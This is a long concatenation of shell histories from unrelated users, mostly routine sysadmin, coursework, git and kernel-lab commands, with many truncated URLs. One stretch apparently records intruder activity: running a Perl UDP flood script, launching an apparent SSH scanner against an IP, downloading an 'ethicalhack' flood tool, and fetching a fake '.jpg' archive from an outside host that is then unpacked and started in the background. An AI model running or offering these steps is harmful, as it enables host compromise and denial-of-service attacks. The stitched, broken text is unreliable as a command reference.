add-port br_ovs eth2 +sudo ovs-vsctl add-port br_ovs eth3 +sudo ovs-vsctl add-port br_ovs eth1 +sudo ovs-vsctl set bridge br_ovs other-config:datapath-id=0000000000000001 +sudo ovs-vsctl set-controller br_ovs tcp: +sudo ovs-vsctl set-fail-mode br_ovs secure +sudo ovs-vsctl show +sudo ovs-vsctl del-port br_ovs ethX-facing-h1 +sudo ovs-vsctl show +ls /var/ +nano /var/log/openvswitch/ovs-vswitchd.log +sudo ovs-ofctl -O OpenFlow13 show ovs_br +sudo ovs-ofctl -O OpenFlow13 show br_ovs +sudo ovs-vsctl show +sudo ovs-ofctl dump-flows br_ovs -O OpenFlow13 table=0 +nano /var/log/openvswitch/ovs-vswitchd.log +ifconfig +sudo ifconfig eth1 +sudo ifconfig eth2 +sudo ifconfig eth3 +ping google.com +ifconfig +ovs-ofctl show br_ovs +sudo ovs-ofctl show br_ovs +sudo ovs-ofctl show -O OpenFlow13 br_ovs +sudo ovs-vswitchd +sudo ovs-vswitchd --help +sudo ovs-vsctl +sudo ovs-vsctl --help +sudo ovs-vsctl get-controller br_ovs +sudo ovs-vsctl list_br br_ovs +sudo ovs-vsctl list-br br_ovs +sudo ovs-vsctl list-br +sudo ovs-vsctl dump-ports br_ovs +sudo ovs-ofctl dump-ports br_ovs +watch sudo ovs-ofctl dump-ports br_ovs +sudo ovs-ofctl dump-ports br_ovs +watch sudo ovs-ofctl dump-ports br_ovs +watch sudo ovs-ofctl dump-flows br_ovs +watch -n 0.5 sudo ovs-ofctl dump-ports br_ovs +sudo ovs-vsctl list bridge +sudo ovs-vsctl bridge br_ovs protocols=OpenFlow13 +sudo ovs-vsctl set bridge br_ovs protocols=OpenFlow13 +sudo ovs-vsctl list bridge +pwd +who +ls +pw +pwd +echo $PS1 +ls -a +PS1=[\u@\h \W]\$ +$PS1=[\u@\h \W]\$ +PS1=[\u@\h \W]\$ +ls +mkdir test2 +ls +ll test2 +ll -d test2 +ls +vim test.php +ls +getfacl test.php +ll +ls +chmod 664 test2 +ll +ls +ll test2 +ll +ll test2 +ll -d test2 +ls +chmod -R 664 test2 +mkdir test3 +ls +ll test3 +ll -d test3 +chmod -R 664 test3 +ls +ll +who am i +ls +sl +ls +pwd +ls +ll +ls +ls +ls +vim test.php +ls +s +ls +chmod 774 test3 +ls +ls +ls +ls +sl +vim test.php +ls +sl +ls +l +ls +ls +sl +env +env | umask +env | grep umask +env | grep UMASK +env +env | grep 0022 +umask +ls +vls +ls +pwd +ls +pwd +umask +umask 0002 +umask +ls +logout +ls +mkdir test2 +ls +ls +ll -d test2 +pwd +ls +ll -d test2 +umask +ls +rm -rf test2 +sl +ll +umask 0002 +ls +mkdir test2 +ls +ll -d test2 +ls +vim test.ph +ls +vim test.ph +ls +vim test.php +ls +l +ls +ls -a +vim .viminfo +ls +pwd +ls -a +ls +pwd +echo $PS1 +$PS1='\W' +PS1='\W' +pwd +echo $PS1 +PS1='[\s-\v\W]\$' +PS1='[\s-\v\W]\$ ' +ls +PS1='[\u-\h \W]\$ ' +logout +pwd +ls +vim .profile +logout +ls +pwd +umask +sl +ls +logou +logout +pwd +ls +rm -rf test2/ +ls +mkdir ajax +ls +ls +umask +ls +vim ajax3.0.js +ls +vim ajax3.0.js +ls +vim demo.html +ls +ls +vim demo.html +ls +vim demo.html +ls +vim server.php +ls +s +ls +vim server.php +ls +vim demo.html +ls +vim demo.html +ls +vim server.php +ls +ls -a +rm -rf .demo.html.swp .server.php.swp +ls +vim demo.html +ls +vim message.txt +ls +vim demo.html +ls +vim server.php +ls +vim demo.html +ls +vim message.txt +s +ls +vim demo.html +ls +vim server.php +ls +vim message.txt +ls +vim message.txt +ls +vim server.php +ls +vim message.txt +ls +vim server.php +s +ls +vim message.txt +ls +vim server.php +ls +vim demo.html +ls +vim server.php +ls +vim message.txt +ls +vim message.txt +ls +vim demo.html +ls +vim message.txt +ls +sl +vim message.txt +ls +ls +la +ls +ls +ls +tail logs/amh-php-errors.log +ls +ls +ls +vim server.php +ls +vim message.txt +ls +vim server.php +ls +vim message.txt +ls +vim server.php +ls +tail message.txt +vim server.php +ls +vim demo.html +ls +vim server.php +ls +vim message.txt +ls +rm -rf message.txt +ls +vim message.txt +ls +vim message.txt +ls +vim server.php +ls +vim message.txt +l +ls +rm -rf message.txt +ls +vim message.txt +l +ls +sl +ls +vim message.txt +ls +vim message.txt +ls +vim demo.html +ls +vim message.txt +ls +vim demo.html +ls +vim server.php +ls +vim demo.html +ls +vim server.php +ls +vim demo.html +l +ls +vim demo.html +ls +vim ajax3.0.js +ls + ls +vim demo.html +ls +vim rev.php +sl +vim demo.html +sl +ls +vim demo.html +s +ls +vim message.txt +s +ls +vim message.txt +ls +rm -rf message.txt +ls +vim demo.html +ls +vim demo.html +ls +vim server.php +ls +vim demo.html +ls +vim rev.php +ls +vim demo.html +s +ls +pwd +vim .profile +ls +mkdir js +ls +ls +vim test.php +ls +s +ls +vim test.php +ls +ls +vim test.php +ls +ls -a +rm -rf .test.php.swp +ls +vim test.php +ls +ls +vim test.php +ls +logout +ls -a +ls -a +rm -f .test.php.swp +ls +ls -a +vim test.php +ls +ls +vim test.php +ls +ls +ls +ls +sl +ls +mkdir ajax +ls +ls +ls +pwd +who +who am i +ls +cat uEnv.tct +cat uEnv.txt +sudo nano uEnv.txt +reboot +sudo reboot +ls +sudo su +java +python +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install file-roller gedit git ttf-ubuntu-font-family +sudo startxiwi +software-center +sudo apt-get install software-center +sudo add-apt-repository ppa:webupd8team/java +sudo apt-get update +sudo apt-get install oracle-java8-installer +sudo add-apt-repository ppa:deadsnakes/ppa +sudo apt-get update +sudo apt-get install python3.6 +ls +ls +tar xvzf pycharm-professional-2017.3.3.tar.gz +sudo mv pycharm-2017.3.3/ /opt/PyCharm +ls /opt +ls /opt/PyCharm/ +ls +tar xvzf ideaIU-2017.3.4-no-jdk.tar.gz +sudo mv idea-IU-173.4548.28/ /opt/IntelliJ +ls /opt +ls /opt/IntelliJ/ +sudo apt-get install libc6-dev-i386 lib32z1 default-jdk +ls +unzip +L +ls +unzip sdk-tools-linux-3859397.zip /Android +ls +unzip sdk-tools-linux-3859397.zip +ls +mkdir ~/Android +ls ~ +mv ~/Android/ /opt/Android +sudo mv ~/Android/ /opt/Android +ls /opt/Android/ +ls /opt/ +sudo mv tools/ /opt/Android/ +ls +ls /opt/Android/ +sudo ./sdkmanager --update +sudo ./sdkmanager "platforms;android-27" "build-tools;27.0.3" "extras;google;m2repository" "extras;android;m2repository" --verbose +sudo ./sdkmanager "platforms;android-27" "build-tools;27.0.3" "extras;google;m2repository" "extras;android;m2repository" --verbose +ls +sudo sh install-processing +ls +ls /opt +gedit +sudo software-center +ls /usr/share/backgrounds/ +sudo mv ~/Downloads/bg /usr/share/backgrounds/ +ls +ls +ls +ls +mv james-donovan-180375-unsplash.jpg ../ +sudo mv james-donovan-180375-unsplash.jpg ../ +ls +sudo mv sven-scheuermeier-37377-unsplash.jpg ../ +sudo mv tobias-keller-104263-unsplash.jpg ../ +ls +rmdir bg +sudo rmdir bg +ls +xfconf-query -c xfwm4 -p /general/mousewheel_rollup -s false +wget +bash ./robuntu-update.sh +robuntu-update -l +cat .bash_aliases +update-robuntu -l +robuntu-update -l +robuntu-update -v +robuntu-update -r +robuntu-update -l +cat /usr/local/bin +cat /usr/local/bin/robuntu-update.sh +bash /usr/local/bin/robuntu-update.sh -l +robuntu-update -l +ls +rm robuntu-update.sh +robuntu-update +robuntu-update -level +robuntu-install +cat .bash_aliases +robuntu-update -set-level 0 +robuntu-update -set-level 2 +robuntu-update +ls /usr/local/bin +cat .bash_aliases +la +cat bash_aliases~ +cat .bash_aliases~ +rm .bash_aliases~ +cat .bash_aliases +ls +find /usr/local/bin -name '*.sh' +find /usr/local/bin -name '*.sh' -delete +sudo find /usr/local/bin -name '*.sh' -delete +ls +wget +ls +cat robuntu-update.sh +rm .robuntu_update_level +rm -rf .git +bash ./robuntu-update.sh +cat .bash_aliases +git status +sudo apt-get install -y git-core +apt-get install -y git-core +ls +ls +cat Untitled.ipynb +ls +whoami +pwd +~ +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +cat day01/ +nbgrader fetch --course data 301a day01 +nbgrader fetch --course data 301a day1 +nbgrader fetch --course data301a day01 +ls +ls +ls +ls +nbgrader fetch --course data301a +nbgrader fetch --course data301a day01 +nbgrader fetch --course data301a day01 +ls +nbgrader fetch --course data301a day03 +nbgrader fetch --course data301a assignment02 +submit --course data301a assignment01 +nbgrader submit --course data301a assignment01 +nbgrader list --course data301a day02 +nbgrader fetch --course data301a assignment01 +nbgrader list --course data301a +nbgrader list --course data301a day02 +ls +nbgrader fetch --course data301a assignment01 day 02 +nbgrader fetch --course data301a day02 +nbgrader fetch --course data301a day04 +nbgrader fetch --course data301a assignment03 +nbgrader submit --course data301a assignment02 +nbgrader fetch --course data301a day05 +nbgrader fetch --course data301a assignment04 +nbgrader submit --course data301a assignment03 +nbgrader submit --course data301a assignment04 +nbgrader fetch --course data301a assignment05 +nbgrader fetch --course data301a day06 +nbgrader fetch --course data301a day07 +nbgrader fetch --course data301a assignment04 +ls +nbgrader fetch --course data301a assignment04 +nbgrader fetch --course data301a assignment07 +nbgrader fetch --course data301a assignment06 +nbgrader fetch --course data301a assignment05 +nbgrader submit --course data301a assignment04 +nbgrader fetch --course data301a assignment06 +nbgrader fetch --course data301a day08 +nbgrader submit --course data301a assignment05 +nbgrader submit --course data301a midterm +nbgrader submit --course data301a assignment06 +nbgrader fetch --course data301a day09 +nbgrader fetch --course data301a midterm +nbgrader fetch --course data301a day10 +nbgrader fetch --course data301a assignment07 +nbgrader submit --course data301a assignment07 +nbgrader fetch --course data301a assignment11 +nbgrader fetch --course data301a assignment10 +nbgrader fetch --course data301a day11 +nbgrader fetch --course data301a assignment08 +nbgrader submit --course data301a assignment07 +nbgrader submit --course data301a assignment08 +nbgrader fetch --course data301a assignment09 +nbgrader fetch --course data301a day11 +nbgrader fetch --course data301a day12 +nbgrader fetch --course data301a assignment08 +nbgrader fetch --course data301a day11 +nbgrader submit --course data301a assignment10 +nbgrader submit --course data301a assignment09 +nbgrader fetch --course data301a day12 +nbgrader fetch --course data301a day13 +nbgrader fetch --course data301a day14 +nbgrader fetch --course data301a day15 +nbgrader fetch --course data301a day16 +nbgrader submit --course data301a assignment11 +nbgrader fetch --course data301a assignment11 +nbgrader fetch --course data301a assignment10 +nbgrader fetch --course data301a assignment11 +nbgrader fetch --course data301a project +nbgrader fetch --course data301a day12 +nbgrader fetch --course data301a day13 +nbgrader fetch --course data301a day14 +nbgrader fetch --course data301a assignment10 +head '/data/movielens-100k/ml-100k/' +head /data/movielens-100k/ml-100k/ +head /data/movielens-100k/ml-100k/u.user +nbgrader submit --course data301a assignment09 +head /data/movielens-100k/ml-100k/u.genre +head /data/movielens-100k/ml-100k/u.user +/data/movielens-100k/ml-100k/u.genre +cat /data/movielens-100k/ml-100k/u.genre +head /data/movielens-100k/ml-100k/u.data +head /data/movielens-100k/ml-100k/u.item +nbgrader fetch --course data301a day17 +nbgrader fetch --course data301a day18 +nbgrader fetch --course data301a assignment11 +nbgrader fetch --course data301a MachineLearning +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +head +ls -lah +ls +ls +ls -lah +ls +ls +ls +pwd +ls +ls +ls +ls +ls +ls yelp/*.json +top +ps axo rss=Mem_Usage_\(KB\),%mem=Mem_Usage_\(\%\),pid=Process_ID,euser:16=User,cmd=Command --sort=-rss | head -n 6 +ls +ls +ls +ls +ls +ls +ls +ls +ls +ps axo rss=Mem_Usage_\(KB\),%mem=Mem_Usage_\(\%\),pid=Process_ID,euser:16=User,cmd=Command --sort=-rss | head -n 6 +source env3/bin/activate +pip list +pip install urllib +ipython +python +vi joepeer_test.py +python joepeer_test.py +vi joepeer_test.py +python joepeer_test.py +pwd +which python +ls +import joepeer +import run_one_day from joepeer +python joepeer.py +joepeer.py run_one_day('time1') +python joepeer.py run_one_day('time1') +python joepeer.py run_one_day("time1") +python joepeer.py run_one_day() +python joepeer.py run_one_day +python joepeer.py run_one_day('advanced') +source env3/bin/activate +ls +python +ls +python time1.py +python advanced.py +python time1.py +exit +logout +exit +ls +source env3/bin/activate +python advanced.py +vi new_stocks.csv +python update_old.py +python time1.py +vi new_stocks.csv +python time2.py +python time3.py +python advanced.py +python update_old.py +ls +vi old_stocks.csv +rm old_stocks.csv +rm new_stocks.csv +python advanced.py +new_stocks.csv +vi new_stocks.csv +python update_old.py +python time1.py +python time2.py +python time3.py +python advanced.py +python update_old.py +vi old_stocks.csv +python time1.py +python time2.py +python time3.py +vi old_stocks.csv +ls +python advanced.py +ls +vi old_stocks.csv +python advanced.py +python update_old.py +ls +python advanced.py +cp old_stocks.csv old_stocks2.csv +ls +python update_old.py +python time1.py +ls +rm new_stocks.csv +ls +rm old_stocks.csv +python advanced.py +python update_old.py +python time1.py +python time2.py +python time3.py +python advanced.py + +python update_old.py +ls +rm new_stocks.csv +rm old_stocks.csv +python advanced.py +python update_old.py +python time1.py +python time2.py +python time3.py +python advanced.py +python update_old.py +python time1.py +ls +ls +mv malaysia/ training_data +ls +python tensorflow/tensorflow/examples/image_retraining/retrain.py --bottleneck_dir=/bottlenecks --model_dir=/inception --how_many_training_steps 2000 --output_labels=/retrained_labels.txt --output_graph=/retrained_graph.pbtxt --image_dir=/training_data/ +ls +cat test/ +ls +ls +python tensorflow/tensorflow/examples/image_retraining/label_image.py --graph=/retrained_graph.pbtxt --labels=/retrained_labels.txt --image=/test/girl1.jpg +python tensorflow/tensorflow/examples/image_retraining/label_image.py --graph=/retrained_graph.pbtxt --labels=/retrained_labels.txt --image=/test/girl2.jpg +python tensorflow/tensorflow/examples/image_retraining/label_image.py --graph=/retrained_graph.pbtxt --labels=/retrained_labels.txt --image=/test/girl3.jpg +ls +ls +python tensorflow/tensorflow/examples/image_retraining/label_image.py --graph=/retrained_graph.pbtxt --labels=/retrained_labels.txt --image=/test/man1.jpg +python tensorflow/tensorflow/examples/image_retraining/label_image.py --graph=/retrained_graph.pbtxt --labels=/retrained_labels.txt --image=/test/man2.jpg +python tensorflow/tensorflow/examples/image_retraining/label_image.py --graph=/retrained_graph.pbtxt --labels=/retrained_labels.txt --image=/hijab1.jpg +python tensorflow/tensorflow/examples/image_retraining/label_image.py --graph=/retrained_graph.pbtxt --labels=/retrained_labels.txt --image=/hijab2.jpg +exit +ls +ls +mkdir macgyver +ls +mkdir temp +vim main +apt-get update +apt-get install vim +ls +vim main +cat main +ls +exit +ls +ls +vim main +ls +cat main +mkdir images +l +ls +ls +vim data.json +vim data.json +ls +ls +vim main +python main +ls +mv retrained_graph.pbtxt retrained_graph.pb +ls +ls +python main +vim main +python main +ls +ls +cat data.json +vim data.json +python main +ls +cat retrained_labels.txt +ls +ls +vim main +python main +vim main +python main +vim main +python main +vim main +python main +vim main +python main +vim main +python main +vim main +python main +vim main +python main +vim main +python main +cat main +vim main +ls +ls +vim data.json +js-beautify -o data.json +cat data.json +ls +python main +vim README.md +main python +python main +ls +ls +vim retrained_labels.txt +ls +python main +exit +ls +ls +rm hijab1.jpg +rm hijab2.jpg +rm retrained_graph.pb +rm retrained_labels.txt +ls +rm -rf men/ +rm -rf women/ +ls +ls +ls +ls +rm temp.jpg +ls +ls +cat data.json +ls +vim main +ls +exit +ls +ls +ls +exit +ls +ls +vim training_commands_examples.txt +ls +exit +ls +ls +cat training_commands_examples.txt +ls +ls +ls +rm -rf training_data/ +exit +ls +ls +cat training_ +mv training_commands_examples.txt trainingCommands.txt +vim trainingCommands.txt +exit +ls +ls +ls +vim main +ls +ls +ls +cat data.json +vim main +python main +ls +ls +ls +python tensorflow/tensorflow/examples/image_retraining/retrain.py --bottleneck_dir=/bottlenecks --model_dir=/inception --output_labels=/retrained_labels.txt --output_graph=/retrained_graph.pb --image_dir=/training_images/ +ls +ls +ls +vim data.json +ls +python main +exit +ls +ls +ls +mv trainingCommands.txt commands.txt +ls +cat commands.txt +ls +vim main +ls +ls +ls +ls +rm dalmation.png +ls +ls +ls +exit +wgetstatic/downloads/vaannila/examples/ant/example/AntExample1.zip +apt-get install unzip +exit +ls +unzip AntExample1.zip +apt-get install unzip +exit +ls +perl udp.pl 0 0 +perl udp.pl 8000 0 +perl udp.pl 0 0 +perl udp.pl 0 0 +ls +tar xzvf iRC.tgz +./x 141.45 22 +ps -x +w +rm -rf * +ls +wget +wget www.freewebton.com/ethicalhack/udp.zip +ls +cat /proc/cpuinfo +ls +ls +ls +perl +exit +ls +ls -al +wget -q -O -s.io/debian/jenkins.io.key | sudo apt-key add - +sudo sh -c 'echo debs.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' +sudo apt update +sudo apt install jenkins +java -version +apt install default-jre +sudo apt install default-jre +sudo +sudo apt install openjdk-11-jre-headless +sudo apt install openjdk-8-jre-headless +sudo apt install openjdk-9-jre-headless +sudo apt install default-jre +java -version +sudo apt install jenkins +sudo systemctl start jenkins +sudo systemctl status jenkins +sudo nano /etc/default/jenkins +sudo service jenkins restart +ifconfig +sudo systemctl status jenkins +sudo nano /etc/default/jenkins +exit +jenkins --version +sudo systemctl status jenkins +sudo nano /etc/network/interfaces +clear +sudo apt update +sudo apt install apt-transport-https ca-certificates curl software-properties-common +curl -fsSLsudo apt-key add - +sudo add-apt-repository "deb [arch=amd64]stable" +sudo apt update +apt-cache policy docker-ce +sudo apt install docker-ce +sudo systemctl status docker +sudo apt update +sudo apt install git +git --version +sudo nano /etc/default/jenkins +sudo systemctl status jenkins +exit +sudo ufw status 8080 +sudo ufw status +sudo nano /etc/default/jenkins +exit +docker ps +exit +sudo systemctl status jenkins +ls +ls +ls +vi config.xml +vi hudson.model.UpdateCenter.xml +vi jenkins.telemetry.Correlator.xml +sudo nano /etc/default/jenkins +ls +systemctl restart jenkins +sudo systemctl restart jenkins +ifconfig +sudo ufw status +sudo systemctl restart jenkins +sudo systemctl status jenkins +cat /var/lib/jenkins/secrets/initialAdminPassword +sudo cat /var/lib/jenkins/secrets/initialAdminPassword +sudo systemctl status jenkins +sudo systemctl restart jenkins +sudo apt-get update +sudo apt-get install apt-transport-https ca-certificates curl gnupg-agent software-properties-common +sudo apt-get update +sudo apt-get install apt-transport-https ca-certificates curl gnupg-agent software-properties-common +curl -fsSLsudo apt-key add - +sudo add-apt-repository "deb [arch=amd64]sb_release -cs) stable" +sudo apt-get update +sudo apt-get install docker-ce docker-ce-cli containerd.io +sudo usermod -aG docker ${USER} +sudo usermod -a -G docker jenkins +sudo visudo +sudo systemctl status jenkins +sudo systemctl restart jenkins +visudo +sudo visudo +docker images +sudo docker images +docker ps +sudo docker ps +sudo docker ps -a +docker ps +sudo docker ps +git clonest.git +ls +ls +vi Dockerfile +sudo docker images +sudo docker ps +systemctl status jenkins +ls +sudo cd /root +su sudo +su -i +sudo root +su root +docker ps +exit +#!/bin/sh +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# ses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +PATH=/bin:/usr/bin +PROG=`basename "$0"` +USAGE="usage: ${PROG} [-p prompt] -x execScript" +PROMPT=NO +STATUS=-1 +fail() { echo $@ >&2; exit 1; } +doExit() { echo ${STATUS} > "${SHFILE}.res"; exit ${STATUS}; } +[ $# -lt 1 ] && fail $USAGE +#!/bin/sh +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. 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See the License for the +# specific language governing permissions and limitations +# under the License. +PATH=/bin:/usr/bin +PROG=`basename "$0"` +USAGE="usage: ${PROG} [-p prompt] -x execScript" +PROMPT=NO +STATUS=-1 +fail() { echo $@ >&2; exit 1; } +doExit() { echo ${STATUS} > "${SHFILE}.res"; exit ${STATUS}; } +[ $# -lt 1 ] && fail $USAGE +git--version +git --version +clear +clear +git init +clear +git --version +Kai Nguyen +clear +clear +git init +ls -la +git add index.html +git status +git add . +git status +git commit -m "revision one" +git log +clear +git --version +git init +git add index.html +clear +git init +git add index.html +git status +git add . +git status +git commit -m "revision one" +clear +git log +git config --global user.email "tnguy34@gmu.edu" +git config --global user.name "Kai Nguyen" +clear +git log +git commit m- "revision two" +clear +git log +clear +git init +git add index.html +git status +git status +git add . +git status +git config --global user.email "allenkain3@gmail.com" +git config --global user.name "Kai Nguyen" +git config --list +git commit -m "revision one" +git status +clear +git log +git status +git checkout index.html +git status +git add . +clear +git status +git status +clear +git status +git reset HEAD index.html +git status +git add . +git status +git commit -m "revision two" +clear +git status +git status +git add index.html +git commit -m "revision three" +git status +git log +clear +git status +git checkout about.html +git status +git status +git add about.html +clear +git status +git reset HEAD about.html +git status +git rm about.html +git status +git reset HEAD about.html +git checkout about.html +clear +git status +git rm about.html +git reset HEAD about.html +git checkout about.html +git status +git add -all +git add --all +git reset HEAD about.html +git checkout about.html +git status +clear +git log +git checkout 3005364b17b8101498162104fe7a4842bee0d782 +clear +git log +git status +git add . +git commit -m "alternate one" +clear +git log +git branch +git checkout mastr +git checkout master +clear +git log +git branch alternate 2ccf4ca +clear +git branch +git checkout alternate +git log +clear +git checkout master +git branch app01 +git branch +git checkout app01 +git add . +git commit -m "revision four" +clear +git log +clear +git branch +git checkout master +git merge app01 +clear +git log +git branch +git branch -m app01 app1 +git branch +clear +git branch +git branch -D alternate +git branch +pwd +git clone +npm install +gulp +git status +git log +git branch -a +clear +git clone -b master +git clone -b master +git log +git log +git log +clear +git init +git log +git add . +git commit -m "first commit" +ls +ls +ps -ef +ls +ls +w +top +ls +df -m +id +ls +pwd +ls +ps -ef +ls +ls +ps -ef +ll +pwdf +pwd +mkdir GIT +mkdir OCI-Autoscale +git clone +sudo su +pwd +l +ll +c GIT/OCI-Autoscale/OCI-AutoScale/ +ll +ll +vi AutoOnOff_compute.py +vi AutoScale.py +ll +ll +vi AutoOnOff_compute.py +pwd +vi AutoOnOff_compute.py +sudo su +vi AutoOnOff_compute.py +sudo su +vi AutoOnOff_compute.py +sudo su +ll +ll +sudo su +ll +ll +vi AutoOnOff_compute.py +python AutoOnOff_compute.py +sudo su +python AutoOnOff_compute.py +sudo su +python AutoOnOff_compute.py +vi AutoOnOff_compute.py +ll +python AutoOnOff_compute.py +vi AutoOnOff_compute.py +python AutoOnOff_compute.py +ll +git commit +ll +git clone +[opc@oraclelinux-2 OCI-AutoScale]$ git commit +git clone +[opc@oraclelinux-2 OCI-AutoScale]$ git commit +git clones://github.com/AnykeyNL/OCI-AutoScale.git +git clone +ll +rm -r * --force +ll +git clone +ll +ll +ll +ll +ll +ll +ll -a +ll +vi README.md +vi AutoOnOff_compute.py +git add README.md +git commit +vi AutoScale.py +vi AutoScale_ADW_ATP.py +git commit +git config --global user.name "videap" +git commit --amend --reset-author +git pull +git push +ll +vi README.md +git commit --amend --reset-author +sudo su +ls -al +ls -al +whois aikidokids.org.au +exit +dir +dir +di +dir +echo 'The only winning move is not to play.' > demo.txt +dir +vi demo.txt +dir +mv demo.txt .htacess +exit +dir +dir +dir +die +dir +cat .htaccess +vi .htaccess +exit +ls +ls +ls +ls +sudo yum update -y +sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 php7.2 +sudo yum install -y httpd mariadb-server +sudo systemctl start httpd +sudo systemctl enable httpd +sudo systemctl is-enabled httpd +echo "" > /var/www/html/phpinfo.php +sudo usermod -a -G apache ec2-user +sudo usermod -a -G apache dchadwick +groups +exit +ls +./docker.sh igrasso +ls +ls +ls +ls +exit +sudo su - +sudo su - jonny +su - +w +sudo su - +su - +w +ifconfig +sudo su - +vi /e +who +pwd +dmes +vi teste +history +/sbin/ifconfig +n1=5 +n2=8 +test "$n1" -gt "$n2" && echo "Maior" || echo "menor" +ifconfig +w +kf +if +if fuckyou true; then cat fuckyou.txt +vi teste.sh +vim teste +man vi +man vim +vi teste.sh +sh teste.sh +vi teste.sh +cat +vi teste +sh teste.sh +rm teste.sh +su - +ls +./BuildRamp2 +ls +./BuildRamp2 +./BuildRamp2 -0.031 -0.012 634 1612 0.001 984 38.5 30 >SAF38.5 +grass5 +exit +pwd +ls +exit +exit +exit +exit +mkdir work +ls -a +wget govandari.envy.nu/sh.jpg +tar xvfz sh.jpg + rm -rf sh.jpg +cat README +nohup ./start 85 >> /dev/null & +git add . +git commit -m "before class2" +git push +./user +vim mymod +vim mymod.c +make +rmmod mymod +insmod mymod.ko +./user +exit +shutdown + +ls +ls +vim mymod.c +vim user.c +vim mymod.c +make +rmmod mymod +insmod mymod.ko +make user +vim user.c +make user +vim user.c +make user +vim reg.h +vim register.h +make user +vim register.h +make user +./user +exit +ls +./user +make +vim mymod.c +make +rmmod mymod +insmod mymod.ko +./user +exit +./user +ls +vim user.c +vim mymod.c +make +rmmod mymod +insmod mymod.ko +./user +exit +vnc4transmitter +./user +vim user.c +vim mymod.c +kyouko3_make +ls +./user +vnc4transmitter +./user +vim mymod.c +vim user.c +make +rmmod mymod +insmod mymod.ko +./user +vim mymod.c +vnc4transmitter +exit +git add. +git add . +git commit -m "before week 3" +git push +exit +ls +ls +mkdir lab4 && cp lab3/*.* lab4/ +ls -all +vim mymod.c +make user.c +ls .. +ls +./user +exit +git add . +git status +git add . +git add -A +git commit -m "before lab4" +git push +ls +make clean +ls +vim mymod.c +ls +vim mymod.c +exit +ls +vim mymod.c +exit +ls +vim mymod.c +exit +ls +vim mymod.c +exit +git add . +git commit -m "before lab6" +git push +uname -r +uname -a +uname +ls +yum install build-essential kernel-package libncurses5-dev +yum install libqt4-dev +ls +ls +ls -a +ls +make clean +ls +rm *.ko +rm *.o +rm mymod* +ls +rm test +rm test.c +ls +ls +ls +ls -a +ls +vim unistd.h +vim arch/x86/entry/syscalls/syscall_64.tbl +vim syscalls.h +vim sys.c +make xconfig +make +vim syscalls.h +vim include/uapi/asm-generic/unistd.h +vim arch/x86/entry/syscalls/syscall_64.tbl +make +exit +mkdir lab6 +ls +vim user.c +ls +ls +ls +ls +ls +ls +vim include/linux/syscalls.h +vim kernel/sys.c +vim arch/x86/entry/syscalls/syscall_64.tbl +ls +vim arch/x86/entry/syscalls/syscall_64.tbl +vim kernel/sys.c +make +vim arch/x86/entry/syscalls/syscall_64.tbl +vim kernel/sys.c +make -j2 +vim arch/x86/entry/syscalls/syscall_64.tbl +make -j2 +ls +ls +ls +ls -a +mv arch/x86/boot/bzImage ../../../ +ls +cp bzImage ~/lab6/ +ls +git add . +git commit -m "before6" +git push +make modules_install install +installkernel bzImage +ls +cp ~/lab6/bzImage ./ +ls +reboot +vnc4transmitter +ls +./user +git pull +ls +./user +kyouko3_make +./user +ls +ls -a +rm Module.symvers +rm mymod.mod.c +rm mymod.mod.o +rm Module.symvers +rm mymod.o +rm mymod.c~ +ls +rm err +rm modules.order +rm test.c~ +ls +rm mymod.ko +ls -a +rm .mymod.* +ls +ls -a +rm -rf .tmp_versions +ls +rm test.c +make +rmmod mymod +insmod mymod.ko +vim /usr/bin/kyouko3_make +ls +ls -a +./user +vnc4transmitter +exit +ls +make bzImage -j2 +vim stoogecalls/stoogecalls.c +make bzImage -j2 +make modules +make modules_install +ls +ls +ls -a |grep .old +ls +cp /boot/vmlinuz-4.3.3.old ~/lab6/ +ls +make install +exit +ls +make xconfig +yum install X +yum install xconfig +make xconfig +yum install Qt4 +make xconfig +make menuconfig +make localmodconfig +make -j2 bzImage +ls +mkdir stoogecalls +vim Makefile +cp Makefile Makefile.orig +vim Makefile +vim stoogecalls.c +vim Makefile +vim Makefile +vim kernel/sys.c +make bzImage -j2 +vim stoogecalls/Makefile +make bzImage -j2 +vnc4transmitter +reboot +vim lab6/user.c +exit +vim lab6/user.c +ls +vim stoogecalls/stoogecalls.c +ls +make bzImage -j2 +vim stoogecalls/stoogecalls.c +make bzImage -j2 +make modules -j2 +make modules_install -j2 +make install +exit +vim user.c +ls +make user.c +gcc user.c -o user +./user +vim /usr/src/linux/stoogecalls/stoogecalls.c +vnc4transmitter +reboot +vim lab6/user.c +exit +vim /usr/src/linux/stoogecalls/stoogecalls.c +exit +vim include/linux/sched.h +ls +vim stoogecalls. +vim stoogecalls.c +vim /usr/src/linux/include/linux/sched.h +vim stoogecalls.c +ls +vim sys.c +ls +vim arch/x86/entry/syscalls/syscall64.h +vim arch/x86/entry/syscalls/syscall_64.tbl +vim stoogecalls/stoogecalls.c +vin arch/x86/entry/syscalls/syscall_64.tbl +vim arch/x86/entry/syscalls/syscall_64.tbl +vim stoogecalls/stoogecalls.c +vim kernel/signal.c +make +vim kernel/signal.c +make -j 2 +vim kernel/signal.c +make -j 2 +vim kernel/signal.c +make -j 2 +vim kernel/signal.c +make -j 2 +vim kernel/signal.c +make -j 2 +vim stoogecalls/stoogecalls.c +make -j 2 +make modules +make modules_install +make install +ls +mv -rf lab6 Project2 +mv lab6 Project2 +ls +ls +mkdir lab1 +mv *.* lab1/ +ls +ls -all +mv bzImage lab1/ +mv user lab1/ +mkdir 2 +rm test.c +rm -r 2 +mkdir lab2 +cp lab1/user.c lab2 +ls +vim user.c +reboot +stoogecalls/stoogecalls.c + +vim /usr/src/linux/include/linux/sched.h +vin 